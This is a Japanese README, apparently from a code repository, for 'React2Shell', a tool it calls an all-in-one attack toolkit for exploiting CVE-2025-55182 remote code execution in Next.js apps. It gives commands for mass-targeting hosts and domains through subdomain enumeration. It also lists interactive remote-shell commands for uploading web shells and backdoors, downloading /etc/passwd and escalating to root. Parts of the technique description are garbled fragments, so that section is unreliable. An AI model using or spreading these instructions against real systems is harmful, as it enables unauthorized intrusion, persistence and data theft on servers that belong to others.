
CVE-2025-55182(Next.js RCE)向けの自動化エクスプロイトフレームワーク。サブドメイン列挙、脆弱性スキャン、ペイロード生成、対話型リモートシェルとファイル操作を備えています。
CVE-2025-55182(Next.js リモートコード実行)の高度な悪用フレームワーク
作者: opsecramdan
React2Shell は、Next.js ベースのアプリケーションにおける CVE-2025-55182 の脆弱性を特定・悪用するためのエクスプロイテーションフレームワークです。
このツールは、以下の機能を備えた オールインワンの攻撃用ツールキット として設計されています:
この脆弱性は、Next.js の内部メカニズムを以下の方法で悪用します:
/login?a=)を通じて結果を漏洩//api/api/auth/_next/admin/dashboardsudo -i 実行依存関係のインストール: pip install requests dnspython
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
cd react2shell-cve-2025-55182
python3 react2shell.py
python3 react2shell.py -u https://target.com
プロトコルなし:
python3 react2shell.py -u target.com
python3 react2shell.py -f targets.txt
targets.txt の内容例:
https://target1.com http://target2.com:3000 target3.com
python3 react2shell.py -d example.com
フロー:
python3 react2shell.py -d example.com -w wordlist.txt
python3 react2shell.py -d example.com --debug
エクスプロイトが成功すると、シェルにアクセスできます。
whoami
id
uname -a
pwd
ls -lah
.upload shell.php /tmp/shell.php
.download /etc/passwd
.create /tmp/test.txt
python3 react2shell.py -d example.com
whoami
.upload backdoor.sh /tmp/backdoor.sh
ツールは以下を生成します:
エクスプロイトに成功した場合:
このツールは以下の目的のみで作成されています:
不正な活動に使用することは禁止されています。
このプロジェクトは以下を示しています:
| コマンド | 説明 |
|---|
| .root | ルートモードの切り替え |
| .upload | ターゲットにファイルをアップロード |
| .download | ターゲットからファイルをダウンロード |
| .create | ターゲット上にファイルを作成 |
| .save | 出力をローカルファイルに保存 |
| .exit | シェルを終了 |